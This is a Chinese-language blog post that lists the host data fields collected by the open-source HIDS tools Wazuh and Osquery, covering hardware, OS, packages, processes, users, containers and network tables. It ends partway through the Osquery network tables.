HIDS数据采集项总结

发表于 分类于
数据采集是HIDS的核心能力之一,数据采集的深度决定攻击链的观测深度、数据采集的广度决定攻击面的观测广度,本文总结HIDS数据采集项及采集技术...

0x01 开源HIDS数据项

先来看Wazuh、Osquery、Elkeid等几个开源HIDS项目的数据采集方案

  • Wazuh:基于ossec扩展,与Elastic Stack和OpenSCAP集成,是一种较为成熟的开源HIDS解决方案
  • Osquery:由FaceBook开源用于对系统进行查询、监控以及分析的一款软件,核心特性是支持SQL的方式来获取操作系统的数据
  • Elkeid:原AgentSmith-HIDS,现由字节安全团队维护,特性是通过定制化的syscall hook,从内核态提供了更为丰富的原始数据

1. Wazuh数据项

Wazuh agent能够收集重要的系统信息,并将其存储到管理端每个agent的 SQLite 数据库中。Syscollector 模块负责此任务

agent启动后,Syscollector 会定期扫描定义的目标(硬件、操作系统、程序包等),将新收集的数据转发给管理器,管理器更新数据库的相应表,可通过查询 Wazuh API 从数据库中检索数据

a. 硬件信息

字段 描述 示例 支持平台
scan_id 扫描标识符 573872577 All
scan_time 扫描时间 2018/7/31 15:31 All
board_serial 主板序列号 XDR840TUGM65E03171 All
cpu_name CPU 名称 Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz All
cpu_cores CPU核心数 4 All
cpu_mhz 当前处理器频率 900.106 All
ram_total 总内存 (KB) 16374572 All
ram_free 可用内存 (KB) 2111928 All
ram_usage 已使用内存占比 87 All
checksum 完整性同步值 503709147600c8e0023cf2b9995772280eee30 All

b. 操作系统

字段 描述 示例 支持平台
scan_id 扫描标识符 468455719 All
scan_time 扫描时间 2018/7/31 15:31 All
hostname 机器主机名 ag-ubuntu-16 All
architecture 操作系统架构 x86_64 All
os_name 操作系统名称 Ubuntu All
os_version 操作系统版本 16.04.5 LTS (Xenial Xerus) All
os_codename 操作系统版本号 Xenial Xerus All
os_major 主要发行版本 16 All
os_minor 次要发型版本 4 All
os_patch 补丁发行版本 5 macOS
os_build 可选build-specific 14393 Windows
os_release Windwos版本号 SP2 Windows
os_display_version Windows 显示版本 20H2 Windows
os_platform 操作系统平台 ubuntu All
sysname 系统名称 Linux Linux
release 发行名称 4.15.0-29-generic Linux
version 发行版本 #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 All
checksum 完整性同步值 503709147600c8e0023cf2b9995772280eee30 All
reference 主键 94b6f7b3c1d905aae22a652448df6372da98e5b8 All

c. Packege信息

在 Linux 系统上,检索到的包可以是 deb、pacman 或 rpm 类型

字段 描述 示例 支持平台
scan_id 扫描标识符 1454946158 All
scan_time 扫描时间 2018/7/27 7:27 All
format package格式 deb All
name package名 linux-headers-generic All
priority package优先级 optional deb
section package section kernel deb/rpm/pkg
size 已安装包的大小(以字节为单位) 14 deb/rpm/pacman
vendor 供应商名称 Ubuntu Kernel Team All
install_time 安装包的日期 2018/2/8 18:45 rpm/pacman/win
version package版本 4.4.0.130.136 All
architecture package架构 amd64 All
multiarch 多架构支持 same deb
source package源 linux-meta deb/rpm/pkg
description package描述 Generic Linux kernel headers deb/rpm/pacman/pkg
location package位置 C:\Program Files\VMware\VMware Tools\ win/pkg
checksum 完整性同步值 78503709147600c8e0023cf2b9995772280eee30 All
item_id 主键 4323709147600c8e0023cf2b9995772280eef451 All

d. 网络接口信息

sys_netiface 表

字段 描述 示例 支持平台
id Id 1 All
scan_id 扫描标识符 160615720 All
scan_time 扫描时间 2018/7/31 16:46 All
name Interface名称 eth0 All
adapter 物理适配器名称 Intel(R) PRO/1000 MT Desktop Adapter Windows
type 网络适配器 ethernet All
state 接口状态 up All
mtu 最大传输单元 1500 All
mac MAC地址 08:00:27:C0:14:A5 All
tx_packets 传输的数据包 30279 All
rx_packets 接收的数据包 12754 All
tx_bytes 已传输字节 10034626 All
rx_bytes 已接收字节 1111175 All
tx_errors 传输错误 0 All
rx_errors 接收错误 0 All
tx_dropped 丢弃的传输包 0 All
rx_dropped 丢弃的接收包 0 All
checksum 完整性同步值 8503709147600c8e0023cf2b9995772280eee30 All
item_id 主键 4323709147600c8e0023cf2b9995772280eef41 All

sys_netaddr 表

字段 描述 示例 支持平台
id 来自 sys_netiface 的参考ID 1 All
scan_id 扫描标识符 160615720 All
proto 协议名称 ipv4 All
address IPv4/IPv6 地址 192.168.1.87 All
netmask 网络掩码地址 255.255.255.0 All
broadcast 广播地址 192.168.1.255 All
checksum 完整性同步值 78503709147600c8e0023cf2b9995772280eee30 All
item_id 主键 4323709147600c8e0023cf2b9995772280eef4 All

sys_netproto 表

字段 描述 示例 支持平台
id 来自 sys_netiface 的参考ID 1 All
scan_id 扫描标识符 160615720 All
iface Interface 名称 eth0 All
type 接口数据协议 ipv4 All
gateway 默认网关 192.168.1.1 Linux/Windows/macOS
dhcp DHCP 状态 enabled Linux/Windows
checksum 完整性同步值 78503709147600c8e0023cf2b9995772280eee30 All
item_id 主键 4323709147600c8e0023cf2b9995772280eef4 All

e. 端口信息

字段 描述 示例 支持平台
scan_id 扫描标识符 1618114744 All
scan_time 扫描时间 2018/7/27 7:27 All
protocol 端口协议 tcp All
local_ip 本地IP地址 0.0.0.0 All
local_port 本地端口 22 All
remote_ip 远程IP地址 0.0.0.0 All
remote_port 远程端口 0 All
tx_queue 等待传输的数据包 0 Linux
rx_queue 接收队列中的数据包 0 Linux
inode 端口inode 16974 Linux
state 端口状态 listening All
PID 已开放端口pid 4 Windows/macOS
process 进程名称 System Windows/macOS
checksum 完整性同步值 78503709147600c8e0023cf2b9995772280eee30 All
item_id 主键 4323709147600c8e0023cf2b9995772280eef412 All

f. 进程信息

字段 描述 示例 支持平台
scan_id 扫描标识符 215303769 All
scan_time 扫描时间 2018/8/3 12:57 All
pid 进程PID 603 All
name 进程名称 rsyslogd All
state 进程状态 S Linux/macOS
ppid 进程PPID 1 All
utime 执行用户代码所用时间 157 Linux
stime 执行系统代码所用时间 221 All
cmd 进程执行命令行 /usr/sbin/rsyslogd Linux/Windows
argvs 命令执行参数 -n Linux
euser Effective用户 root Linux/macOS
ruser Real 用户 root Linux/macOS
suser Saved-set 用户 root Linux
egroup Effective 组 root Linux
rgroup Real 组 root Linux/macOS
sgroup Saved-set 组 root Linux
fgroup 文件系统组名 root Linux
priority 内核调度优先级 20 All
nice 进程Nice值 0 Linux/macOS
size 进程大小 53030 All
vm_size VM 总大小 (KB) 212120 All
resident 进程的驻留大小(以字节为单位) 902 Linux
share 共享内存 814 Linux
start_time 进程启动时间 1893 Linux
pgrp 进程组 603 Linux
session 进程会话 603 All
nlwp 轻量级进程数 3 All
tgid 线程组ID 603 Linux
tty 进程TTY数 0 Linux
processor 处理器数 0 Linux
checksum 完整性同步值 78503709147600c8e0023cf2b9995772280eee30 All

2. Osquery数据项

a. 事件表

apparmor_events

跟踪 AppArmor 事件

字段 类型 描述
type TEXT Event type
message TEXT Raw audit message
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
apparmor TEXT Apparmor Status like ALLOWED, DENIED etc.
operation TEXT Permission requested by the process
parent UNSIGNED_BIGINT Parent process PID
profile TEXT Apparmor profile name
name TEXT Process name
pid UNSIGNED_BIGINT Process ID
comm TEXT Command-line name of the command that was used to invoke the analyzed process
denied_mask TEXT Denied permissions for the process
capname TEXT Capability requested by the process
fsuid UNSIGNED_BIGINT Filesystem user ID
ouid UNSIGNED_BIGINT Object owner’s user ID
capability BIGINT Capability number
requested_mask TEXT Requested access mask
info TEXT Additional information
error TEXT Error information
namespace TEXT AppArmor namespace
label TEXT AppArmor label

bpf_process_events

跟踪时间/动作进程执行情况

字段 类型 描述
tid BIGINT Thread ID
pid BIGINT Process ID
parent BIGINT Parent process ID
uid BIGINT User ID
gid BIGINT Group ID
cid INTEGER Cgroup ID
exit_code TEXT Exit code of the system call
probe_error INTEGER Set to 1 if one or more buffers could not be captured
syscall TEXT System call name
path TEXT Binary path
cwd TEXT Current working directory
cmdline TEXT Command line arguments
duration INTEGER How much time was spent inside the syscall (nsecs)
json_cmdline TEXT Command line arguments, in JSON format
ntime TEXT The nsecs uptime timestamp as obtained from BPF
time BIGINT Time of execution in UNIX time
eid INTEGER Event ID

bpf_socket_events

跟踪网络套接字打开和关闭

字段 类型 描述
tid BIGINT Thread ID
pid BIGINT Process ID
parent BIGINT Parent process ID
uid BIGINT User ID
gid BIGINT Group ID
cid INTEGER Cgroup ID
exit_code TEXT Exit code of the system call
probe_error INTEGER Set to 1 if one or more buffers could not be captured
syscall TEXT System call name
path TEXT Path of executed file
fd TEXT The file description for the process socket
family INTEGER The Internet protocol family ID
type INTEGER The socket type
protocol INTEGER The network protocol ID
local_address TEXT Local address associated with socket
remote_address TEXT Remote address associated with socket
local_port INTEGER Local network protocol port number
remote_port INTEGER Remote network protocol port number
duration INTEGER How much time was spent inside the syscall (nsecs)
ntime TEXT The nsecs uptime timestamp as obtained from BPF
time BIGINT Time of execution in UNIX time
eid INTEGER Event ID

file_events

跟踪配置数据中指定文件的时间/操作更改

字段 类型 描述
target_path TEXT The path associated with the event
category TEXT The category of the file defined in the config
action TEXT Change action (UPDATE, REMOVE, etc)
transaction_id BIGINT ID used during bulk update
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
size BIGINT Size of file in bytes
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Last status change time
md5 TEXT The MD5 of the file after change
sha1 TEXT The SHA1 of the file after change
sha256 TEXT The SHA256 of the file after change
hashed INTEGER 1 if the file was hashed, 0 if not, -1 if hashing failed
time BIGINT Time of file event
eid TEXT Event ID

hardware_events

来自 UDEV 或 IOKit 的硬件 (PCI/USB/HID) 事件

字段 类型 描述
action TEXT Remove, insert, change properties, etc
path TEXT Local device path assigned (optional)
type TEXT Type of hardware and hardware event
driver TEXT Driver claiming the device
vendor TEXT Hardware device vendor
vendor_id TEXT Hex encoded Hardware vendor identifier
model TEXT Hardware device model
model_id TEXT Hex encoded Hardware model identifier
serial TEXT Device serial (optional)
revision TEXT Device revision (optional)
time BIGINT Time of hardware event
eid TEXT Event ID

process_events

跟踪时间/动作进程执行情况

字段 类型 描述
pid BIGINT Process (or thread) ID
path TEXT Path of executed file
mode TEXT File mode permissions
cmdline TEXT Command line arguments (argv)
cmdline_size BIGINT Actual size (bytes) of command line arguments
env TEXT Environment variables delimited by spaces
env_count BIGINT Number of environment variables
env_size BIGINT Actual size (bytes) of environment list
cwd TEXT The process current working directory
auid BIGINT Audit User ID at process start
uid BIGINT User ID at process start
euid BIGINT Effective user ID at process start
gid BIGINT Group ID at process start
egid BIGINT Effective group ID at process start
owner_uid BIGINT File owner user ID
owner_gid BIGINT File owner group ID
atime BIGINT File last access in UNIX time
mtime BIGINT File modification in UNIX time
ctime BIGINT File last metadata change in UNIX time
btime BIGINT File creation in UNIX time
overflows TEXT List of structures that overflowed
parent BIGINT Process parent’s PID, or -1 if cannot be determined.
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
status BIGINT OpenBSM Attribute: Status of the process
fsuid BIGINT Filesystem user ID at process start
suid BIGINT Saved user ID at process start
fsgid BIGINT Filesystem group ID at process start
sgid BIGINT Saved group ID at process start
syscall TEXT Syscall name: fork, vfork, clone, execve, execveat

process_file_events

使用审计服务的文件完整性监控实现

字段 类型 描述
operation TEXT Operation type
pid BIGINT Process ID
ppid BIGINT Parent process ID
time BIGINT Time of execution in UNIX time
executable TEXT The executable path
partial TEXT True if this is a partial event (i.e.: this process existed before we started osquery)
cwd TEXT The current working directory of the process
path TEXT The path associated with the event
dest_path TEXT The canonical path associated with the event
uid TEXT The uid of the process performing the action
gid TEXT The gid of the process performing the action
auid TEXT Audit user ID of the process using the file
euid TEXT Effective user ID of the process using the file
egid TEXT Effective group ID of the process using the file
fsuid TEXT Filesystem user ID of the process using the file
fsgid TEXT Filesystem group ID of the process using the file
suid TEXT Saved user ID of the process using the file
sgid TEXT Saved group ID of the process using the file
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

seccomp_events

跟踪 seccomp 事件的虚拟表

字段 类型 描述
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
auid UNSIGNED_BIGINT Audit user ID (loginuid) of the user who started the analyzed process
uid UNSIGNED_BIGINT User ID of the user who started the analyzed process
gid UNSIGNED_BIGINT Group ID of the user who started the analyzed process
ses UNSIGNED_BIGINT Session ID of the session from which the analyzed process was invoked
pid UNSIGNED_BIGINT Process ID
comm TEXT Command-line name of the command that was used to invoke the analyzed process
exe TEXT The path to the executable that was used to invoke the analyzed process
sig BIGINT Signal value sent to process by seccomp
arch TEXT Information about the CPU architecture
syscall TEXT Type of the system call
compat BIGINT Is system call in compatibility mode
ip TEXT Instruction pointer value
code TEXT The seccomp action

selinux_events

跟踪 SELinux 事件

字段 类型 描述
type TEXT Event type
message TEXT Message
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

socket_events

跟踪网络套接字打开和关闭

字段 类型 描述
action TEXT The socket action (bind, listen, close)
pid BIGINT Process (or thread) ID
path TEXT Path of executed file
fd TEXT The file description for the process socket
auid BIGINT Audit User ID
status TEXT Either ‘succeeded’, ‘failed’, ‘in_progress’ (connect() on non-blocking socket) or ‘no_client’ (null accept() on non-blocking socket)
family INTEGER The Internet protocol family ID
protocol INTEGER The network protocol ID
local_address TEXT Local address associated with socket
remote_address TEXT Remote address associated with socket
local_port INTEGER Local network protocol port number
remote_port INTEGER Remote network protocol port number
socket TEXT The local path (UNIX domain socket only)
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
success INTEGER Deprecated. Use the ‘status’ column instead

syslog_events

字段 类型 描述
time BIGINT Current unix epoch time
datetime TEXT Time known to syslog
host TEXT Hostname configured for syslog
severity INTEGER Syslog severity
facility TEXT Syslog facility
tag TEXT The syslog tag
message TEXT The syslog message
eid TEXT Event ID

user_events

使用audit框架跟踪用户事件

字段 类型 描述
uid BIGINT User ID
auid BIGINT Audit User ID
pid BIGINT Process (or thread) ID
message TEXT Message from the event
type INTEGER The file description for the process socket
path TEXT Supplied path from event
address TEXT The Internet protocol address or family ID
terminal TEXT The network protocol ID
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

yara_events

跟踪配置数据中指定文件的 YARA 匹配项

字段 类型 描述
target_path TEXT The path scanned
category TEXT The category of the file
action TEXT Change action (UPDATE, REMOVE, etc)
transaction_id BIGINT ID used during bulk update
matches TEXT List of YARA matches
count INTEGER Number of YARA matches
strings TEXT Matching strings
tags TEXT Matching tags
time BIGINT Time of the scan
eid TEXT Event ID

b. 软件包信息

apt_sources

APT 存储库或软件信息

字段 类型 描述
name TEXT Repository name
source TEXT Source file
base_uri TEXT Repository base URI
release TEXT Release name
version TEXT Repository source version
maintainer TEXT Repository maintainer
components TEXT Repository components
architectures TEXT Repository architectures
pid_with_namespace INTEGER Pids that contain a namespace

deb_packages

安装的 DEB 包数据库

字段 类型 描述
name TEXT Package name
version TEXT Package version
source TEXT Package source
size BIGINT Package size in bytes
arch TEXT Package architecture
revision TEXT Package revision
status TEXT Package status
maintainer TEXT Package maintainer
section TEXT Package section
priority TEXT Package priority
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

npm_packages

列出目录中或系统中全局安装的所有 npm 包

字段 类型 描述
name TEXT Package display name
version TEXT Package supplied version
description TEXT Package supplied description
author TEXT Package author name
license TEXT License for package
path TEXT Module’s package.json path
directory TEXT Node module’s directory where this package is located
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

python_packages

安装在系统中的 Python 包

字段 类型 描述
name TEXT Package display name
version TEXT Package-supplied version
summary TEXT Package-supplied summary
author TEXT Optional package author
license TEXT License under which package is launched
path TEXT Path at which this module resides
directory TEXT Directory where Python modules are located
pid_with_namespace INTEGER Pids that contain a namespace

rpm_package_files

当前安装在主机系统上的 RPM 包

字段 类型 描述
package TEXT RPM package name
path TEXT File path within the package
username TEXT File default username from info DB
groupname TEXT File default groupname from info DB
mode TEXT File permissions mode from info DB
size BIGINT Expected file size in bytes from RPM info DB
sha256 TEXT SHA256 file digest from RPM info DB

rpm_packages

当前安装在主机系统上的 RPM 包

字段 类型 描述
name TEXT RPM package name
version TEXT Package version
release TEXT Package release
source TEXT Source RPM package name (optional)
size BIGINT Package size in bytes
sha1 TEXT SHA1 hash of the package contents
arch TEXT Architecture(s) supported
epoch INTEGER Package epoch value
install_time INTEGER When the package was installed
vendor TEXT Package vendor
package_group TEXT Package group
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

yum_sources

当前的 Yum 存储库或软件信息

字段 类型 描述
name TEXT Repository name
baseurl TEXT Repository base URL
enabled TEXT Whether the repository is used
gpgcheck TEXT Whether packages are GPG checked
gpgkey TEXT URL to GPG key
pid_with_namespace INTEGER Pids that contain a namespace

c. 用户/组信息

users

本地用户帐户(包括已在本地 (Windows) 登录的域帐户)

字段 类型 描述
uid BIGINT User ID
gid BIGINT Group ID (unsigned)
uid_signed BIGINT User ID as int64 signed (Apple)
gid_signed BIGINT Default group ID as int64 signed (Apple)
username TEXT Username
description TEXT Optional user description
directory TEXT User’s home directory
shell TEXT User’s configured default shell
uuid TEXT User’s UUID (Apple) or SID (Windows)
type TEXT Whether the account is roaming (domain), local, or a system profile
is_hidden INTEGER IsHidden attribute set in OpenDirectory
pid_with_namespace INTEGER Pids that contain a namespace

user_groups

本地系统用户组关系

字段 类型 描述
uid BIGINT User ID
gid BIGINT Group ID

user_ssh_keys

返回用户 ~/.ssh 目录中的私钥以及它们是否已加密

字段 类型 描述
uid BIGINT The local user that owns the key file
path TEXT Path to key file
encrypted INTEGER 1 if key is encrypted, 0 otherwise
key_type TEXT The type of the private key. One of [rsa, dsa, dh, ec, hmac, cmac], or the empty string.
pid_with_namespace INTEGER Pids that contain a namespace

groups

本地系统组

字段 类型 描述
gid BIGINT Unsigned int64 group ID
gid_signed BIGINT A signed int64 version of gid
groupname TEXT Canonical local group name
group_sid TEXT Unique group ID
comment TEXT Remarks or comments associated with the group
is_hidden INTEGER IsHidden attribute set in OpenDirectory
pid_with_namespace INTEGER Pids that contain a namespace

shadow

本地系统用户加密密码和相关信息

字段 类型 描述
password_status TEXT Password status
hash_alg TEXT Password hashing algorithm
last_change BIGINT Date of last password change (starting from UNIX epoch date)
min BIGINT Minimal number of days between password changes
max BIGINT Maximum number of days between password changes
warning BIGINT Number of days before password expires to warn user about it
inactive BIGINT Number of days after password expires until account is blocked
expire BIGINT Number of days since UNIX epoch date until account is disabled
flag BIGINT Reserved
username TEXT Username

sudoers

通过 sudo 以其他用户身份运行命令的规则

字段 类型 描述
source TEXT Source file containing the given rule
header TEXT Symbol for given rule
rule_details TEXT Rule definition

suid_bin

公共位置的 suid 二进制文件

字段 类型 描述
path TEXT Binary path
username TEXT Binary owner username
groupname TEXT Binary owner group
permissions TEXT Binary permissions
pid_with_namespace INTEGER Pids that contain a namespace

shell_history

每个用户 .*_history 数据的行分隔(命令)表

字段 类型 描述
uid BIGINT Shell history owner
time INTEGER Entry timestamp. It could be absent, default value is 0.
command TEXT Unparsed date/line/command history line
history_file TEXT Path to the .*_history for this user

d. 容器信息

docker_container_envs

Docker 容器环境变量

字段 类型 描述
id TEXT Container ID
key TEXT Environment variable name
value TEXT Environment variable value

docker_container_fs_changes

更改容器文件系统上的文件或目录

字段 类型 描述
id TEXT Container ID
path TEXT FIle or directory path relative to rootfs
change_type TEXT Type of change: C:Modified, A:Added, D:Deleted

docker_container_labels

Docker 容器标签

字段 类型 描述
id TEXT Container ID
key TEXT Label key
value TEXT Optional label value

docker_container_mounts

Docker 容器挂载

字段 类型 描述
id TEXT Container ID
type TEXT Type of mount (bind, volume)
name TEXT Optional mount name
source TEXT Source path on host
destination TEXT Destination path inside container
driver TEXT Driver providing the mount
mode TEXT Mount options (rw, ro)
rw INTEGER 1 if read/write. 0 otherwise
propagation TEXT Mount propagation

docker_container_networks

Docker 容器网络

字段 类型 描述
id TEXT Container ID
name TEXT Network name
network_id TEXT Network ID
endpoint_id TEXT Endpoint ID
gateway TEXT Gateway
ip_address TEXT IP address
ip_prefix_len INTEGER IP subnet prefix length
ipv6_gateway TEXT IPv6 gateway
ipv6_address TEXT IPv6 address
ipv6_prefix_len INTEGER IPv6 subnet prefix length
mac_address TEXT MAC address

docker_container_ports

Docker 容器端口

字段 类型 描述
id TEXT Container ID
type TEXT Protocol (tcp, udp)
port INTEGER Port inside the container
host_ip TEXT Host IP address on which public port is listening
host_port INTEGER Host port

docker_container_processes

Docker 容器进程

字段 类型 描述
id TEXT Container ID
pid BIGINT Process ID
name TEXT The process path or shorthand argv[0]
cmdline TEXT Complete argv
state TEXT Process state
uid BIGINT User ID
gid BIGINT Group ID
euid BIGINT Effective user ID
egid BIGINT Effective group ID
suid BIGINT Saved user ID
sgid BIGINT Saved group ID
wired_size BIGINT Bytes of unpageable memory used by process
resident_size BIGINT Bytes of private memory used by process
total_size BIGINT Total virtual memory size
start_time BIGINT Process start in seconds since boot (non-sleeping)
parent BIGINT Process parent’s PID
pgroup BIGINT Process group
threads INTEGER Number of threads used by process
nice INTEGER Process nice level (-20 to 20, default 0)
user TEXT User name
time TEXT Cumulative CPU time. [DD-]HH:MM:SS format
cpu DOUBLE CPU utilization as percentage
mem DOUBLE Memory utilization as percentage

docker_container_stats

Docker 容器统计信息。对该表的查询至少需要一秒钟

字段 类型 描述
id TEXT Container ID
name TEXT Container name
pids INTEGER Number of processes
read BIGINT UNIX time when stats were read
preread BIGINT UNIX time when stats were last read
interval BIGINT Difference between read and preread in nano-seconds
disk_read BIGINT Total disk read bytes
disk_write BIGINT Total disk write bytes
num_procs INTEGER Number of processors
cpu_total_usage BIGINT Total CPU usage
cpu_kernelmode_usage BIGINT CPU kernel mode usage
cpu_usermode_usage BIGINT CPU user mode usage
system_cpu_usage BIGINT CPU system usage
online_cpus INTEGER Online CPUs
pre_cpu_total_usage BIGINT Last read total CPU usage
pre_cpu_kernelmode_usage BIGINT Last read CPU kernel mode usage
pre_cpu_usermode_usage BIGINT Last read CPU user mode usage
pre_system_cpu_usage BIGINT Last read CPU system usage
pre_online_cpus INTEGER Last read online CPUs
memory_usage BIGINT Memory usage
memory_max_usage BIGINT Memory maximum usage
memory_limit BIGINT Memory limit
network_rx_bytes BIGINT Total network bytes read
network_tx_bytes BIGINT Total network bytes transmitted

docker_containers

Docker 容器信息

字段 类型 描述
id TEXT Container ID
name TEXT Container name
image TEXT Docker image (name) used to launch this container
image_id TEXT Docker image ID
command TEXT Command with arguments
created BIGINT Time of creation as UNIX time
state TEXT Container state (created, restarting, running, removing, paused, exited, dead)
status TEXT Container status information
pid BIGINT Identifier of the initial process
path TEXT Container path
config_entrypoint TEXT Container entrypoint(s)
started_at TEXT Container start time as string
finished_at TEXT Container finish time as string
privileged INTEGER Is the container privileged
security_options TEXT List of container security options
env_variables TEXT Container environmental variables
readonly_rootfs INTEGER Is the root filesystem mounted as read only
cgroup_namespace TEXT cgroup namespace
ipc_namespace TEXT IPC namespace
mnt_namespace TEXT Mount namespace
net_namespace TEXT Network namespace
pid_namespace TEXT PID namespace
user_namespace TEXT User namespace
uts_namespace TEXT UTS namespace

docker_image_history

Docker 镜像历史信息

字段 类型 描述
id TEXT Image ID
created BIGINT Time of creation as UNIX time
size BIGINT Size of instruction in bytes
created_by TEXT Created by instruction
tags TEXT Comma-separated list of tags
comment TEXT Instruction comment

docker_image_labels

Docker 镜像标签

字段 类型 描述
id TEXT Image ID
key TEXT Label key
value TEXT Optional label value

docker_image_layers

Docker 镜像 layers 信息

字段 类型 描述
id TEXT Image ID
layer_id TEXT Layer ID
layer_order INTEGER Layer Order (1 = base layer)

docker_images

Docker 镜像信息

字段 类型 描述
id TEXT Image ID
created BIGINT Time of creation as UNIX time
size_bytes BIGINT Size of image in bytes
tags TEXT Comma-separated list of repository tags

docker_info

Docker 系统信息

字段 类型 描述
id TEXT Docker system ID
containers INTEGER Total number of containers
containers_running INTEGER Number of containers currently running
containers_paused INTEGER Number of containers in paused state
containers_stopped INTEGER Number of containers in stopped state
images INTEGER Number of images
storage_driver TEXT Storage driver
memory_limit INTEGER 1 if memory limit support is enabled. 0 otherwise
swap_limit INTEGER 1 if swap limit support is enabled. 0 otherwise
kernel_memory INTEGER 1 if kernel memory limit support is enabled. 0 otherwise
cpu_cfs_period INTEGER 1 if CPU Completely Fair Scheduler (CFS) period support is enabled. 0 otherwise
cpu_cfs_quota INTEGER 1 if CPU Completely Fair Scheduler (CFS) quota support is enabled. 0 otherwise
cpu_shares INTEGER 1 if CPU share weighting support is enabled. 0 otherwise
cpu_set INTEGER 1 if CPU set selection support is enabled. 0 otherwise
ipv4_forwarding INTEGER 1 if IPv4 forwarding is enabled. 0 otherwise
bridge_nf_iptables INTEGER 1 if bridge netfilter iptables is enabled. 0 otherwise
bridge_nf_ip6tables INTEGER 1 if bridge netfilter ip6tables is enabled. 0 otherwise
oom_kill_disable INTEGER 1 if Out-of-memory kill is disabled. 0 otherwise
logging_driver TEXT Logging driver
cgroup_driver TEXT Control groups driver
kernel_version TEXT Kernel version
os TEXT Operating system
os_type TEXT Operating system type
architecture TEXT Hardware architecture
cpus INTEGER Number of CPUs
memory BIGINT Total memory
http_proxy TEXT HTTP proxy
https_proxy TEXT HTTPS proxy
no_proxy TEXT Comma-separated list of domain extensions proxy should not be used for
name TEXT Name of the docker host
server_version TEXT Server version
root_dir TEXT Docker root directory

docker_network_labels

Docker 网络标签

字段 类型 描述
id TEXT Network ID
key TEXT Label key
value TEXT Optional label value

docker_networks

Docker 网络信息

字段 类型 描述
id TEXT Network ID
name TEXT Network name
driver TEXT Network driver
created BIGINT Time of creation as UNIX time
enable_ipv6 INTEGER 1 if IPv6 is enabled on this network. 0 otherwise
subnet TEXT Network subnet
gateway TEXT Network gateway

docker_version

Docker版本信息

字段 类型 描述
version TEXT Docker version
api_version TEXT API version
min_api_version TEXT Minimum API version supported
git_commit TEXT Docker build git commit
go_version TEXT Go version
os TEXT Operating system
arch TEXT Hardware architecture
kernel_version TEXT Kernel version
build_time TEXT Build time

docker_volume_labels

Docker 卷标

字段 类型 描述
name TEXT Volume name
key TEXT Label key
value TEXT Optional label value

docker_volumes

Docker 卷信息

字段 类型 描述
name TEXT Volume name
driver TEXT Volume driver
mount_point TEXT Mount point
type TEXT Volume type

e. 网络信息

arp_cache

地址解析缓存,包括静态和动态(来自 ARP、NDP)

字段 类型 描述
address TEXT IPv4 address target
mac TEXT MAC address of broadcasted address
interface TEXT Interface of the network for the MAC
permanent TEXT 1 for true, 0 for false

dns_resolvers

主机使用的解析器

字段 类型 描述
id INTEGER Address type index or order
type TEXT Address type: sortlist, nameserver, search
address TEXT Resolver IP/IPv6 address
netmask TEXT Address (sortlist) netmask length
options BIGINT Resolver options
pid_with_namespace INTEGER Pids that contain a namespace

interface_addresses

网络接口和相关元数据

字段 类型 描述
interface TEXT Interface name
address TEXT Specific address for interface
mask TEXT Interface netmask
broadcast TEXT Broadcast address for the interface
point_to_point TEXT PtP address for the interface
type TEXT Type of address. One of dhcp, manual, auto, other, unknown
friendly_name TEXT The friendly display name of the interface.

interface_details

网络接口的详细信息和统计信息

字段 类型 描述
interface TEXT Interface name
mac TEXT MAC of interface (optional)
type INTEGER Interface type (includes virtual)
mtu INTEGER Network MTU
metric INTEGER Metric based on the speed of the interface
flags INTEGER Flags (netdevice) for the device
ipackets BIGINT Input packets
opackets BIGINT Output packets
ibytes BIGINT Input bytes
obytes BIGINT Output bytes
ierrors BIGINT Input errors
oerrors BIGINT Output errors
idrops BIGINT Input drops
odrops BIGINT Output drops
collisions BIGINT Packet Collisions detected
last_change BIGINT Time of last device modification (optional)
link_speed BIGINT Interface speed in Mb/s
pci_slot TEXT PCI slot number
friendly_name TEXT The friendly display name of the interface.
description TEXT Short description of the object a one-line string.
manufacturer TEXT Name of the network adapter’s manufacturer.
connection_id TEXT Name of the network connection as it appears in the Network Connections Control Panel program.
connection_status TEXT State of the network adapter connection to the network.
enabled INTEGER Indicates whether the adapter is enabled or not.
physical_adapter INTEGER Indicates whether the adapter is a physical or a logical adapter.
speed INTEGER Estimate of the current bandwidth in bits per second.
service TEXT The name of the service the network adapter uses.
dhcp_enabled INTEGER If TRUE, the dynamic host configuration protocol (DHCP) server automatically assigns an IP address to the computer system when establishing a network connection.
dhcp_lease_expires TEXT Expiration date and time for a leased IP address that was assigned to the computer by the dynamic host configuration protocol (DHCP) server.
dhcp_lease_obtained TEXT Date and time the lease was obtained for the IP address assigned to the computer by the dynamic host configuration protocol (DHCP) server.
dhcp_server TEXT IP address of the dynamic host configuration protocol (DHCP) server.
dns_domain TEXT Organization name followed by a period and an extension that indicates the type of organization, such as ‘microsoft.com’.
dns_domain_suffix_search_order TEXT Array of DNS domain suffixes to be appended to the end of host names during name resolution.
dns_host_name TEXT Host name used to identify the local computer for authentication by some utilities.
dns_server_search_order TEXT Array of server IP addresses to be used in querying for DNS servers.

interface_ipv6

网络接口的 IPv6 配置和统计信息

字段 类型 描述
interface TEXT Interface name
hop_limit INTEGER Current Hop Limit
forwarding_enabled INTEGER Enable IP forwarding
redirect_accept INTEGER Accept ICMP redirect messages
rtadv_accept INTEGER Accept ICMP Router Advertisement

listening_ports

具有监听(绑定)网络套接字/端口的进程

字段 类型 描述
pid INTEGER Process (or thread) ID
port INTEGER Transport layer port
protocol INTEGER Transport protocol (TCP/UDP)
family INTEGER Network protocol (IPv4, IPv6)
address TEXT Specific address for bind
fd BIGINT Socket file descriptor number
